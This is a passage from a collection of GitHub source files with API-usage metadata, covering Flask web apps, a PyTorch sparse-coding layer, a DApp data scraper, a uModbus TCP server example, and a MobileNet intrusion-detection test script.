"line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "gzip.open", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 17, "usage_type": "attribute"}, {"api_name": "gzip.open", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 21, "usage_type": "attribute"}, {"api_name": "torch.utils.data.Dataset", "line_number": 27, "usage_type": "attribute"}, {"api_name": "torch.utils.data", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "72346406885", "text": "from flask import Flask, render_template, request, redirect\nimport process as ps\nimport webbrowser\n\napp = Flask(__name__)\n\n\n@app.route('/check')\ndef sanity_check():\n return 'Si está funcionando', 200\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html'), 404\n\n\n@app.route('/analysis')\ndef analysis():\n return render_template('display_type.html'), 200\n\n\n@app.route('/variables', methods=['GET', 'POST'])\ndef variables():\n display_type = request.form.get(\"display_type\")\n\n if display_type == 'live':\n return render_template('tableu.html')\n elif display_type == 'live02':\n return render_template('tableu02.html')\n elif display_type == 'live03':\n return render_template('tableu03.html')\n elif display_type == 'live04':\n return render_template('tableu04.html')\n elif display_type == 'calc':\n return render_template('calc.html')\n elif display_type == 'dnn':\n return redirect(\"https://colab.research.google.com/drive/12qXsQ2_Sc9kNngT1h2klbaDdIRiR_5NX?usp=sharing\",\n code=302)\n\n return render_template('variables.html', display_type=display_type), 200\n\n\n@app.route('/calculate', methods=['GET', 'POST'])\ndef calculate():\n mes = request.form.get(\"mes\")\n day_of_week = request.form.get(\"day_of_week\")\n weather = request.form.get(\"weather\")\n ciudad = request.form.get(\"ciudad\")\n time = request.form.get(\"time\")\n\n probabilidad = ps.get_probabilidad(mes=mes, day_of_week=day_of_week, weather=weather, ciudad=ciudad, time=time )\n\n return render_template('calculate.html', probabilidad=round(probabilidad * 100, 3)), 200\n\n\n@app.route('/')\ndef home():\n return render_template('index.html'), 200\n\n\n@app.route('/home')\ndef main_menu():\n return render_template('index.html'), 200\n\n\n@app.route('/visualize', methods=['GET', 'POST'])\ndef visualize():\n variable = request.form.get(\"variable\")\n\n ps.run(variable)\n\n n = ps.get_id()\n n = int(n) - 1\n\n webbrowser.open_new_tab(f'http://localhost:5000/static/result{n}.jpg')\n\n return render_template('display_type.html'), 200\n\n\nif __name__ == '__main__':\n app.run()\n", "repo_name": "DanielCordovaV/crash-probability-analysis", "sub_path": "webapp/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2166, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 15, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 25, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 28, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 46, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 46, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 47, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 47, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 48, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 48, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 49, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 49, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 49, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 50, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 50, "usage_type": "name"}, {"api_name": "process.get_probabilidad", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 54, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 64, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 69, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 69, "usage_type": "name"}, {"api_name": "process.run", "line_number": 71, "usage_type": "call"}, {"api_name": "process.get_id", "line_number": 73, "usage_type": "call"}, {"api_name": "webbrowser.open_new_tab", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 78, "usage_type": "call"}]} +{"seq_id": "42237582447", "text": "import math\nimport torch\nimport torch.nn as nn\nfrom torch.nn.functional import conv1d\nfrom torch.nn.functional import conv2d\nfrom torch.nn.functional import conv3d\nfrom torch.nn.functional import conv_transpose1d\nfrom torch.nn.functional import conv_transpose2d\nfrom torch.nn.functional import conv_transpose3d\nimport scipy.io\nimport numpy as np\nimport os\n\nfrom utils.utils import ShiftedReLU\n\n\nclass ConvSparseLayer(nn.Module):\n \"\"\"\n An implementation of a Convolutional Sparse Layer\n \"\"\"\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1,\n padding=0, lam=0.5, activation_lr=1e-1,\n max_activation_iter=200, rectifier=True, convo_dim=2):\n super().__init__()\n\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.conv_dim = convo_dim\n\n if isinstance(kernel_size, int):\n self.kernel_size = self.conv_dim * (kernel_size,)\n else:\n self.kernel_size = kernel_size\n\n if isinstance(stride, int):\n self.stride = self.conv_dim * (stride,)\n else:\n self.stride = stride\n\n if isinstance(padding, int):\n self.padding = self.conv_dim * (padding,)\n else:\n self.padding = padding\n\n self.activation_lr = activation_lr\n self.max_activation_iter = max_activation_iter\n\n self.filters = nn.Parameter(torch.rand((out_channels, in_channels) +\n self.kernel_size),\n requires_grad=True)\n torch.nn.init.xavier_uniform_(self.filters)\n self.normalize_weights()\n\n if rectifier:\n self.threshold = ShiftedReLU(lam)\n else:\n self.threshold = nn.Softshrink(lam)\n\n if self.conv_dim == 1:\n self.convo = conv1d\n self.deconvo = conv_transpose1d\n elif self.conv_dim == 2:\n self.convo = conv2d\n self.deconvo = conv_transpose2d\n elif self.conv_dim == 3:\n self.convo = conv3d\n self.deconvo = conv_transpose3d\n else:\n raise ValueError(\"Conv_dim must be 1, 2, or 3\")\n\n self.lam = lam\n\n def normalize_weights(self):\n with torch.no_grad():\n norms = torch.norm(self.filters.reshape(\n self.out_channels, self.in_channels, -1), dim=2, keepdim=True)\n norms = torch.max(norms, 1e-12*torch.ones_like(norms)).view(\n (self.out_channels, self.in_channels) +\n len(self.filters.shape[2:])*(1,)).expand(self.filters.shape)\n self.filters.div_(norms)\n\n def reconstructions(self, activations):\n return self.deconvo(activations, self.filters, padding=self.padding,\n stride=self.stride)\n\n def loss(self, images, activations):\n reconstructions = self.reconstructions(activations)\n loss = 0.5 * (1/images.shape[0]) * torch.sum(\n torch.pow(images - reconstructions, 2))\n loss += self.lam * torch.mean(torch.sum(torch.abs(\n activations.reshape(activations.shape[0], -1)), dim=1))\n return loss\n\n def u_grad(self, u, images):\n acts = self.threshold(u)\n recon = self.reconstructions(acts)\n e = images - recon\n du = -u\n du += self.convo(e, self.filters, padding=self.padding,\n stride=self.stride)\n du += acts\n return du\n \n def get_output_shape(self, images):\n output_shape = []\n if self.conv_dim >= 1:\n output_shape.append(math.floor(((images.shape[2] + 2 *\n self.padding[0] -\n (self.kernel_size[0] - 1) - 1) /\n self.stride[0]) + 1))\n if self.conv_dim >= 2:\n output_shape.append(math.floor(((images.shape[3] + 2 *\n self.padding[1] -\n (self.kernel_size[1] - 1) - 1) /\n self.stride[1]) + 1))\n if self.conv_dim >= 3:\n output_shape.append(math.floor(((images.shape[4] + 2 *\n self.padding[2] -\n (self.kernel_size[2] - 1) - 1) /\n self.stride[2]) + 1))\n \n return output_shape\n \n\n def activations(self, images, u_init):\n with torch.no_grad():\n output_shape = self.get_output_shape(images)\n # print('input shape', images.shape)\n # print('output shape', output_shape)\n\n# u = torch.zeros([images.shape[0], self.out_channels] +\n# output_shape, device=self.filters.device)\n# u = torch.full([images.shape[0], self.out_channels] +\n# output_shape, fill_value=self.lam, device=self.filters.device)\n u = u_init.detach().clone().to(self.filters.device)\n# for i in range(self.max_activation_iter):\n# du = self.u_grad(u, images)\n# # print(torch.sum(du))\n# # print(\"grad_norm={}, iter={}\".format(torch.norm(du), i))\n# u += self.activation_lr * du\n# if torch.norm(du) < 0.01:\n# break\n b1 = 0.9\n b2 = 0.999\n eps = 1e-8\n m = torch.zeros_like(u)\n v = torch.zeros_like(u)\n for i in range(self.max_activation_iter):\n g = self.u_grad(u, images)\n m = b1 * m + (1-b1) * g\n v = b2 * v + (1-b2) * g**2\n mh = m / (1 - b1**(i+1))\n vh = v / (1 - b2**(i+1))\n u += self.activation_lr * mh / (torch.sqrt(vh) + eps)\n\n return self.threshold(u), u\n\n def forward(self, images, u_init):\n return self.activations(images, u_init)\n \n \n def import_opencv_dir(self, in_dir):\n i = 0\n for f in sorted(os.listdir(in_dir), key=lambda x: str(x)):\n if not f.endswith('.mat'):\n continue\n mat = scipy.io.loadmat(os.path.join(in_dir, f))\n\n dic = torch.from_numpy((mat['weight_vals'].astype(np.float32)))\n\n dic = dic.permute(2,1,0).unsqueeze(1)\n\n dic = dic.float() /1\n\n if self.filters.data[:,:,i,:,:].size() != dic.size():\n raise Exception('Input dictionary size is: ' + str(dic.size()) + ' while model filter size is: ' + str(self.filters.data[:,:,i,:,:].size()))\n\n self.filters.data[:,:,i,:,:] = dic\n\n i += 1\n", "repo_name": "Rosinaweber/locally", "sub_path": "sparse_coding_lime/feature_extraction/conv_sparse_model.py", "file_name": "conv_sparse_model.py", "file_ext": "py", "file_size_in_byte": 6729, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 17, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.rand", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "attribute"}, {"api_name": "utils.utils.ShiftedReLU", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn.Softshrink", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.nn.functional.conv1d", "line_number": 60, "usage_type": "name"}, {"api_name": "torch.nn.functional.conv_transpose1d", "line_number": 61, "usage_type": "name"}, {"api_name": "torch.nn.functional.conv2d", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.nn.functional.conv_transpose2d", "line_number": 64, "usage_type": "name"}, {"api_name": "torch.nn.functional.conv3d", "line_number": 66, "usage_type": "name"}, {"api_name": "torch.nn.functional.conv_transpose3d", "line_number": 67, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.pow", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 90, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 107, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 112, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 126, "usage_type": "call"}, {"api_name": "torch.zeros_like", "line_number": 146, "usage_type": "call"}, {"api_name": "torch.zeros_like", "line_number": 147, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 154, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 164, "usage_type": "call"}, {"api_name": "scipy.io.io.loadmat", "line_number": 167, "usage_type": "call"}, {"api_name": "scipy.io.io", "line_number": 167, "usage_type": "attribute"}, {"api_name": "scipy.io", "line_number": 167, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 167, "usage_type": "call"}, {"api_name": "os.path", "line_number": 167, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 169, "usage_type": "attribute"}]} +{"seq_id": "38335696918", "text": "from flask import Flask, url_for, render_template, request\nfrom flaskext.markdown import Markdown\n\n#NLP Part\nimport en_core_web_sm\nfrom spacy import displacy\nnlp = en_core_web_sm.load()\nimport json\n\napp = Flask(__name__)\nMarkdown(app)\n\nHTML_WRAPPER = \"\"\"
    {}
    \"\"\"\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/input', methods=['POST'])\ndef inp():\n return render_template('input.html')\n\n@app.route('/extract', methods=['POST'])\ndef extract():\n if request.method == 'POST':\n raw = request.form['rawtext']\n doc = nlp(raw)\n html = displacy.render(doc, style='ent')\n html = html.replace('\\n\\n', '\\n')\n res = HTML_WRAPPER.format(html)\n \n return render_template('result.html', rawtext=raw, result=res)\n\n@app.route('/review')\ndef review():\n return render_template('review.html')\n\n@app.route('/preview', methods=['POST'])\ndef preview():\n if request.method == 'POST':\n new = request.form['newtext']\n res = new\n\n return render_template('preview.html', newtext=new, result=res)\n\nif __name__ == '__main__':\n app.run(host='localhost', port=8000, debug=True)", "repo_name": "charlescsr/displacify", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1253, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "en_core_web_sm.load", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 10, "usage_type": "call"}, {"api_name": "flaskext.markdown.Markdown", "line_number": 11, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 25, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 26, "usage_type": "name"}, {"api_name": "spacy.displacy.render", "line_number": 28, "usage_type": "call"}, {"api_name": "spacy.displacy", "line_number": 28, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 41, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 41, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "4444271251", "text": "import requests\nimport time\nimport json\nimport pandas as pd\nimport numpy as np\nfrom pandas import DataFrame\n\n# id_dict = {\"9928\":\"Forsage-Smartway\",\"10144\":\"EASY-CLUB\",\"8848\":\"MillionMoney\",\"9801\":\"DoubleWay\",\"9696\":\"HEX\",\"10124\":\"Ethrun\",\"9910\":\"Fomo5k\",\"9756\":\"RED-BOX-DAPP\",\"7747\":\"CryptoHands\",\"9823\":\"PyraBank-Hex\",\"8702\":\"Pledgecamp\",\"8843\":\"Shuffle-Monster-V3\",\"9570\":\"Diamond-Dividends\",\"10004\":\"DeFiGroup-ch---ETH\",\"10092\":\"Crypto-Life\"}\n\ndef build_db(input_path:str, save_path:str):\n df = pd.read_csv(input_path)\n index_list = df['index'].values\n scrape_dappradar(index_list, save_path)\n return\n\ndef save_as_csv_dappradar(r_text:str, save_path):\n store_list = []\n r_dict = json.loads(r_text)\n if r_dict[\"success\"] == False:\n print(\"API access failed: success = false\")\n return\n r_contracts = r_dict[\"data\"][\"contracts\"]\n r_info = r_dict[\"data\"][\"info\"]\n for contract in r_contracts:\n if r_info[\"author\"] == \"\":\n author = \"NA\"\n else:\n author = r_info[\"author\"]\n line_list = [contract[\"address\"], r_info[\"id\"], r_info[\"title\"].replace(\" \", \"_\"), r_info[\"category\"], author, r_info[\"balance\"], r_info[\"contractsCount\"], r_info[\"rankings\"][\"overall\"]]\n store_list.append(line_list)\n \n store_array = np.array(store_list)\n df = pd.DataFrame(store_array, index = None, columns = ['address', 'id', 'title', 'category', 'author', 'balance', 'contractsCount', 'ranking'])\n file_path = save_path + str(r_info[\"id\"]) + \"_\" + r_info[\"title\"] + \".csv\"\n df.to_csv(file_path)\n return\n\ndef scrape_dappradar(index_list, save_path):\n i = 1\n length = len(index_list)\n for index in index_list:\n # randsleep = np.random.randint(low = 1, high = 5, size = 1)\n # time.sleep(randsleep)\n\n request_link = \"https://dappradar.com/api/dapp/\" + str(index)\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36\",\n \"Connection\": \"keep-alive\",\n \"accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\n \"accept-language\": \"en-US,en;q=0.9,ja;q=0.8,zh-CN;q=0.7,zh-TW;q=0.6,zh;q=0.5\",\n \"cache-control\": \"no-cache\",\n \"pragma\": \"no-cache\",\n \"sec-fetch-dest\": \"document\",\n \"sec-fetch-mode\": \"navigate\",\n \"sec-fetch-site\": \"none\",\n \"sec-fetch-user\": \"?1\",\n \"upgrade-insecure-requests\": \"1\"\n }\n try:\n r = requests.get(request_link, headers = headers, timeout=150).text\n except:\n print(\"connection failed\")\n # save_as_csv_dappradar(r, save_path)\n try:\n save_as_csv_dappradar(r, save_path)\n except:\n print('error')\n \n print(f\"{ i }/{ length } Dapp processed.\")\n i += 1\n # break\n return\n\ndef saveAsCSV(r_json, key, path):\n r_json = eval(r_json)[\"content\"]\n # Load the lists\n stday_list = np.asarray(eval(r_json[\"stday_list\"]))\n balance_list = np.asarray(eval(r_json[\"balance_list\"]))\n datadau_list = np.asarray(eval(r_json[\"datadau_list\"]))\n ethvolume_list = np.asarray(eval(r_json[\"ethvolume_list\"]))\n exchangerangking_list = np.asarray(eval(r_json[\"exchangerangking_list\"]))\n totalrangking_list = np.asarray(eval(r_json[\"totalrangking_list\"]))\n txs_list = np.asarray(eval(r_json[\"txs_list\"]))\n\n # Format the arrays\n Date = stday_list.reshape(len(stday_list), 1)\n Balance = balance_list.reshape(len(balance_list), 1)\n DAU = datadau_list.reshape(len(datadau_list), 1)\n ETH_Vol = ethvolume_list.reshape(len(ethvolume_list), 1)\n Exchange_Rank = exchangerangking_list.reshape(len(exchangerangking_list), 1)\n Total_Rank = totalrangking_list.reshape(len(totalrangking_list), 1)\n Txs = txs_list.reshape(len(txs_list), 1)\n\n # hstack the arrays together\n data_array = np.hstack([Date, Balance, DAU, ETH_Vol, Exchange_Rank, Total_Rank, Txs])\n\n # Turn Array into Dataframe\n df = DataFrame(data_array, index = None, columns = ['Date', 'Balance', 'DAU', 'Vol', 'Cate Rank', 'Total Rank', 'Txs'])\n\n # Save as CSV file\n save_file_name = id_dict[key] + '.csv'\n save_file_path = path + save_file_name\n df.to_csv(save_file_path)\n\ndef ScrapeData(dict, save_path):\n i = 1\n e = 0\n for key in dict:\n # randsleep = np.random.randint(low = 1, high = 10, size = 1)\n # time.sleep(randsleep)\n payload = {\n 'daynumber':'all',\n 'id': key,\n 'sign':'false',\n 'langue':'en'\n }\n\n headers = {\"accept\":\"application/json, text/plain, */*\",\"accept-language\":\"zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7\",\"cache-control\":\"no-cache\",\"content-type\":\"application/x-www-form-urlencoded\",\"pragma\":\"no-cache\",\"sec-fetch-mode\":\"cors\",\"sec-fetch-site\":\"same-origin\"}\n r = requests.post('https://dapptotal.com/api/view',headers = headers, data = payload).text\n try:\n saveAsCSV(r, key, save_path)\n print(str(i) + \" file saved: \" + dict[key])\n i = i + 1\n except:\n print(\"error occurred.\")\n e = e + 1\n i = i + 1\n print(f\"{i} files scrapped, {e} failed.\")\n\nif __name__ == '__main__':\n # ScrapeData(id_dict, './csv_data/tron/highrisk/')\n # ScrapeData(id_dict, './top15_data/highrisk/')\n build_db('./contract_db/all_cate_top25_index.csv','./contract_db/all_cate_top25/')\n\n", "repo_name": "Gullintani/Ethereum-User-Profile", "sub_path": "scraper.py", "file_name": "scraper.py", "file_ext": "py", "file_size_in_byte": 6364, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 11, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 33, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 95, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 98, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 119, "usage_type": "call"}]} +{"seq_id": "19065096617", "text": "#!/usr/bin/env python\n# scripts/examples/simple_tcp_server.py\nimport logging\nfrom socketserver import TCPServer\nfrom collections import defaultdict\nfrom argparse import ArgumentParser\n\nfrom umodbus import conf\nfrom umodbus.server.tcp import RequestHandler, get_server\nfrom umodbus.utils import log_to_stream\n\n# Add stream handler to logger 'uModbus'.\nlog_to_stream(level=logging.DEBUG)\n\n# A very simple data store which maps addresses against their values.\ndata_store = defaultdict(int)\n\n# Enable values to be signed (default is False).\nconf.SIGNED_VALUES = True\n\n# Parse command line arguments\nparser = ArgumentParser()\nparser.add_argument(\"-b\", \"--bind\", default=\"localhost:502\")\n\nargs = parser.parse_args()\nif \":\" not in args.bind:\n args.bind += \":502\"\nhost, port = args.bind.rsplit(\":\", 1)\nport = int(port)\n\nTCPServer.allow_reuse_address = True\ntry:\n app = get_server(TCPServer, (host, port), RequestHandler)\nexcept PermissionError:\n print(\"You don't have permission to bind on {}\".format(args.bind))\n print(\"Hint: try with a different port (ex: --bind localhost:50200)\")\n exit(1)\n\n\n@app.route(slave_ids=[1], function_codes=[1, 2], addresses=list(range(0, 10)))\ndef read_data_store(slave_id, function_code, address):\n \"\"\"\" Return value of address. \"\"\"\n return data_store[address]\n\n\n@app.route(slave_ids=[1], function_codes=[5, 15], addresses=list(range(0, 10)))\ndef write_data_store(slave_id, function_code, address, value):\n \"\"\"\" Set value for address. \"\"\"\n data_store[address] = value\n\n\nif __name__ == '__main__':\n try:\n app.serve_forever()\n finally:\n app.shutdown()\n app.server_close()\n", "repo_name": "AdvancedClimateSystems/uModbus", "sub_path": "scripts/examples/simple_tcp_server.py", "file_name": "simple_tcp_server.py", "file_ext": "py", "file_size_in_byte": 1647, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 197, "dataset": "github-code", "pt": "52", "api": [{"api_name": "umodbus.utils.log_to_stream", "line_number": 13, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 13, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 16, "usage_type": "call"}, {"api_name": "umodbus.conf.SIGNED_VALUES", "line_number": 19, "usage_type": "attribute"}, {"api_name": "umodbus.conf", "line_number": 19, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 22, "usage_type": "call"}, {"api_name": "socketserver.TCPServer.allow_reuse_address", "line_number": 31, "usage_type": "attribute"}, {"api_name": "socketserver.TCPServer", "line_number": 31, "usage_type": "name"}, {"api_name": "umodbus.server.tcp.get_server", "line_number": 33, "usage_type": "call"}, {"api_name": "socketserver.TCPServer", "line_number": 33, "usage_type": "argument"}, {"api_name": "umodbus.server.tcp.RequestHandler", "line_number": 33, "usage_type": "argument"}]} +{"seq_id": "73963646565", "text": "import sys \nimport torch\nimport torch.nn as nn\n\nfrom MobileNet import *\nfrom UNSWBINARYDATASET import *\nfrom UNSWORIGINDATASET import *\nfrom UNSWGRAYDATASET import *\n\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data import Dataset\n\ndef test(model, test_loader, ptfile):\n print(\"Model weight load\")\n model.load_state_dict(torch.load('./ptfiles/'+ptfile))\n model = model.cuda()\n print(\"Model weight load Complete\")\n model.eval()\n \n correct = 0\n Category = []\n print(\"Testing.....\")\n for idx, (input, target) in enumerate(test_loader):\n input = np.array(input)\n input = torch.tensor(input, dtype=torch.float32)\n\n input = input.unsqueeze(1)\n input = input.float()\n input = input.cuda()\n \n output = model(input)\n # print(\"Output type : \", type(output))\n # print(\"Target type : \", type(target))\n\n # print(\"Output[0] type : \", type(output[0]))\n # print(\"Target[0] type : \", type(target[0]))\n tmp_correct= 0\n # output = output.cpu().detach().numpy()\n output = torch.argmax(output, dim=1)\n output = output.cpu()\n Category = Category + output.tolist()\n\n for i in range(len(output)):\n\n if(output[i] == target[i]):\n correct += 1\n tmp_correct += 1\n \n print(\"Current acc => \", tmp_correct / len(output))\n acc = correct/len(test_data)\n print(\"==========================================\")\n print(\"Total Acc =>\", acc)\n print(\"==========================================\")\n\n df = pd.DataFrame(Category, columns=['Category'])\n df.to_csv('./results/'+ptfile+'.csv', index=False)\n print(ptfile, \"done!\")\n\n return acc\n\nclass AvalancheDataset(Dataset):\n def __init__(self):\n data = pd.read_csv('./abnormals/total.csv', index_col=False)\n # data = pd.read_csv('./abnormals/UDP_Flooding.csv', index_col=False)\n data = data.drop(['No.'], axis=1).values\n patches = []\n for dat in data:\n patches.append(make_patch(dat, (32, 32)))\n \n self.x_test = []\n self.y_test = []\n\n for idx,_ in enumerate(patches):\n pf = PacketFeature((224, 224))\n if( (idx + 49) > len(patches)):\n break\n \n for count in range(49):\n pf.append(patches[idx+count])\n\n self.y_test.append(1)\n self.x_test.append(pf.frame)\n \n def __len__(self):\n return len(self.y_test)\n \n def __getitem__(self, idx):\n return self.x_test[idx], self.y_test[idx]\n \n\nif __name__ == \"__main__\":\n pt_file = sys.argv[1]\n print(\"Model load\")\n model = MobileNetV1(ch_in=1, n_classes=2)\n print(\"Model load Complete\")\n\n print(\"loading test_data\")\n # test_data = MyDataSet_TEST()\n test_data = AvalancheDataset()\n # test_data = UNSWORIGINDATASETTEST()\n # test_data = UNSWGRAYDATASETTEST()\n print(\"loading test_data complete\")\n\n test_loader = DataLoader(test_data, batch_size = 64, shuffle=False)\n \n # pt_files = [\n # 'binarytraining_9.pt', 'binarytraining_19.pt',\n # 'binarytraining_29.pt', 'binarytraining_39.pt',\n # 'binarytraining_49.pt', 'binarytraining_59.pt',\n # 'binarytraining_69.pt', 'binarytraining_79.pt',\n # 'binarytraining_89.pt', 'binarytraining_99.pt',\n # 'binarytraining_109.pt','binarytraining_119.pt',\n # 'binarytraining_129.pt','binarytraining_139.pt',\n # 'binarytraining_149.pt'\n # ]\n # pt_files = [\n # 'graytraining_9.pt', 'graytraining_19.pt',\n # 'graytraining_29.pt', 'graytraining_39.pt',\n # 'graytraining_49.pt', 'graytraining_59.pt',\n # 'graytraining_69.pt', 'graytraining_79.pt',\n # 'graytraining_89.pt', 'graytraining_99.pt',\n # 'graytraining_109.pt', 'graytraining_119.pt',\n # 'graytraining_129.pt', 'graytraining_139.pt',\n # 'graytraining_149.pt'\n # ]\n # pt_files = [\n # 'originaltraining_9.pt', 'originaltraining_19.pt',\n # 'originaltraining_29.pt', 'originaltraining_39.pt',\n # 'originaltraining_49.pt', 'originaltraining_59.pt',\n # 'originaltraining_69.pt', 'originaltraining_79.pt',\n # 'originaltraining_89.pt', 'originaltraining_99.pt',\n # 'originaltraining_109.pt', 'originaltraining_119.pt',\n # 'originaltraining_129.pt', 'originaltraining_139.pt',\n # 'originaltraining_149.pt'\n # ]\n test_acc_list = []\n test_acc_list.append(test(model, test_loader, pt_file))\n\n # for ptfile in pt_files:\n # test_acc_list.append(test(model, test_loader, ptfile))\n \n test_acc_list = 